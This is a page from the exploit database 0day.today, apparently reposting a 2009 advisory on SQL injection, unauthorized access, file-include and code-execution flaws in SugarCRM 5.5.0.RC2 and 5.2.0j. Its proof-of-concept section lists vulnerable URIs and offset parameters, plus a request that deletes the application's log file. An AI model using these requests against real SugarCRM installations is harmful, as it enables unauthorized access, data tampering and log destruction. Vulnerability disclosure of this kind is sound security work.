0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Sugar CRM 5.5.0.RC2 and 5.2.0j Multiple Remote Vulnerabilities

Author

waraxe

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-10042

Category

web applications

Date add

29-11-2009

Platform

unsorted

==============================================================
Sugar CRM 5.5.0.RC2 and 5.2.0j Multiple Remote Vulnerabilities
==============================================================

Vulnerable:
SugarCRM SugarCRM 5.5.0.RC2
SugarCRM SugarCRM 5.2.0j
 
Product:
http://www.sugarcrm.com/crm/
 
Description:
SugarCRM is prone to multiple remote vulnerabilities, including:
 
1. Multiple SQL-injection vulnerabilities
2. Multiple unauthorized access vulnerabilities
3. A remote file-include vulnerability
4. A remote code-execution vulnerability
 
Exploiting these issues could allow an attacker to gain unauthorized access to the affected application, gain access to sensitive information, execute arbitrary PHP code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks are also possible.
 
SugarCRM 5.2.0j and 5.5.0.RC2 are vulnerable; other versions may also be affected.
 
 
POC:
An attacker can exploit these issues through a browser
 
The following example URIs are available:
 
http://server/sugarce520j/index.php?module=Opportunities&action=index
Opportunities2_OPPORTUNITY_offset
 
http://server/sugarce520j/index.php?module=Project&action=index
Project2_PROJECT_offset
 
http://server/sugarce520j/index.php?module=Cases&action=index
Cases2_CASE_offset
 
http://server/sugarce520j/index.php?module=Bugs&action=index
Bugs2_BUG_offset
 
http://server/sugarce520j/index.php?module=Tasks
Tasks2_TASK_offset
 
http://server/sugarce520j/index.php?module=Meetings&action=index&return_module=Meetings&return_action=DetailView
Meetings2_MEETING_offset
 
http://server/sugarce520j/index.php?module=Calls&action=index&return_module=Calls&return_action=DetailView
Calls2_CALL_offset
 
http://server/sugarce520j/index.php?module=Notes&action=index&return_module=Notes&return_action=DetailView
Notes2_NOTE_offset
 
http://server/sugarce520j/index.php?entryPoint=HandleAjaxCall&method=remove&file=sugarcrm.log


#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Sugar CRM 5.5.0.RC2 and 5.2.0j Multiple Remote Vulnerabilities

Report Error

Report Error